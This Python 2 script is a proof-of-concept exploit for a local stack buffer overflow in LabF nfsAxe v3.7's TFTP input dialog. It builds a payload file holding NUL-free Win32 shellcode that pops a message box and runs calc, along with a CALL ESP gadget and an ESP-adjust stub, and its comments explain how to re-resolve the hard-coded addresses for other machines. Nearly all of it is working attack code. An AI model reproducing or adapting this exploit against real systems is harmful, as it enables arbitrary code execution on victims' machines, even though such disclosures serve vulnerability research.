
#!/usr/bin/python
########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow
# Date: 29-01-2018
# Software: LabF nfsAxe
# Version: v3.7
# Vendor Homepage: http://www.labf.com
# Software Link: http://www.labf.com/download/nfsaxe.exe
# Tested on: Windows 7 x86
########################################################################################################

import struct

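# ESP-adjust stub executed right after the CALL ESP gadget: moves ESP back by
# 4*0x58 + 0x10 = 0x170 (368) bytes and jumps there.  17 bytes, no 0x00 bytes.
# The bytes are written as "\x.." escapes so that len() counts machine-code
# bytes, not characters -- the padding arithmetic in `offset` relies on that.
ropAlignEsp = (
    "\x83\xEC\x58"  # SUB ESP,58
    "\x83\xEC\x58"  # SUB ESP,58
    "\x83\xEC\x58"  # SUB ESP,58
    "\x83\xEC\x58"  # SUB ESP,58
    "\x83\xEC\x10"  # SUB ESP,10
    "\xFF\xE4"      # JMP ESP
)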

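# 90-byte, NUL-free Win32 x86 shellcode.  Every address marked "(Change)" is an
# absolute address from the author's "Windows 7 x86" test machine (see header)
# and will differ on other systems -- with ASLR, typically on every boot -- so
# resolve MessageBoxA, system and ExitProcess on the target and patch the three
# MOV immediates before use.
#
# Both strings are built on the stack with PUSH and NUL-terminated by pushing
# ECX, which is set to 0 via the 32-bit wrap-around 0xEEEEEEEF + 0x11111111 so
# that no 0x00 byte appears in the shellcode itself.
scode = (
    # -- stage 1: MessageBoxA(hWnd, lpText, lpCaption, uType) showing the
    #    20-char string "B0f_pwnd_by_s1kr10s!" as both text and caption.
    #    hWnd and uType are EAX-1, i.e. whatever the crashing code left in EAX
    #    (not controlled by this listing).
    "\xB9\xEF\xEE\xEE\xEE"      # MOV ECX,EEEEEEEF
    "\x81\xC1\x11\x11\x11\x11"  # ADD ECX,11111111   -> ECX = 0 (terminator)
    "\x51"                      # PUSH ECX
    "\x68\x31\x30\x73\x21"      # PUSH "10s!"
    "\x68\x73\x31\x6B\x72"      # PUSH "s1kr"
    "\x68\x5F\x62\x79\x5F"      # PUSH "_by_"
    "\x68\x70\x77\x6E\x64"      # PUSH "pwnd"
    "\x68\x42\x30\x66\x5F"      # PUSH "B0f_"
    "\x8B\xD4"                  # MOV EDX,ESP        -> EDX = &"B0f_pwnd_by_s1kr10s!"
    "\x48"                      # DEC EAX
    "\x50"                      # PUSH EAX           (uType)
    "\x52"                      # PUSH EDX           (lpCaption)
    "\x52"                      # PUSH EDX           (lpText)
    "\x50"                      # PUSH EAX           (hWnd)
    "\xBA\x11\xEA\x1A\x76"      # MOV EDX,USER32.MessageBoxA (Change)
    "\xFF\xD2"                  # CALL EDX
    # -- stage 2: msvcrt.system("calc")
    "\x33\xD2"                  # XOR EDX,EDX
    "\xB9\xEF\xEE\xEE\xEE"      # MOV ECX,EEEEEEEF
    "\x81\xC1\x11\x11\x11\x11"  # ADD ECX,11111111   -> ECX = 0 (terminator)
    "\x51"                      # PUSH ECX
    "\x68\x63\x61\x6C\x63"      # PUSH "calc"
    "\x8B\xD4"                  # MOV EDX,ESP        -> EDX = &"calc"
    "\x52"                      # PUSH EDX           (command)
    "\x33\xD2"                  # XOR EDX,EDX
    "\xBA\x6F\xB1\x0F\x76"      # MOV EDX,msvcrt.system = 0x760FB16F (Change)
    "\xFF\xD2"                  # CALL EDX
    # -- stage 3: kernel32.ExitProcess(EAX); EAX is whatever system() left
    #    there (by convention its return value).
    "\x50"                      # PUSH EAX
    "\xB8\xE2\xBB\xB5\x75"      # MOV EAX,kernel32.ExitProcess (Change)
    "\xFF\xD0"                  # CALL EAX
)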

# Assemble the three labelled sections of the PoC text (presumably the three
# input fields of the TFTP dialog): "Host:", "File(s):" and
# "Remote Dir y Local Dir:".  The "File(s):" section carries the overflow:
# 33 filler bytes, the CALL ESP gadget address, 5 filler bytes, the ESP-adjust
# stub, then padding so that the section is 1000 + len(stub) - 5 bytes long
# after the stub.  Sizes and the gadget address are the author's values for
# nfsAxe v3.7 on Windows 7 x86; the gadget address is absolute and must be
# re-resolved on any other system.
# NOTE: Python 2 only -- on Python 3 struct.pack() returns bytes and the
# str concatenation below raises TypeError.
host_field = "Host: " + scode + "A" * (1000 - len(scode)) + " "
files_field = "".join([
    "File(s): ",
    "B" * 33,
    struct.pack("<L", 0x75A6923D),  # CALL ESP in ADVAPI32.DLL (absolute address)
    "B" * 5,
    ropAlignEsp,
    "B" * (1000 + len(ropAlignEsp) - 5),
    " ",
])
dirs_field = "Remote Dir y Local Dir: " + "C" * 1000
offset = host_field + files_field + dirs_field

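payload = offset

# Single-argument print() behaves the same under Python 2 and 3.
print("Payload len: " + str(len(payload)))
print("Shellcode len: " + str(len(scode)))

# Write the PoC as raw bytes.  Text mode ('w') is correct under Python 2 only:
# under Python 3 it would UTF-8-encode every byte >= 0x80 of the shellcode and
# gadget address into two bytes and silently break the offsets.  latin-1 maps
# code points 0-255 to the same byte values, so the "\x.." escapes survive;
# binary mode also avoids newline translation on Windows.
with open('tftpPoc.txt', 'wb') as out:
    out.write(payload if isinstance(payload, bytes) else payload.encode('latin-1'))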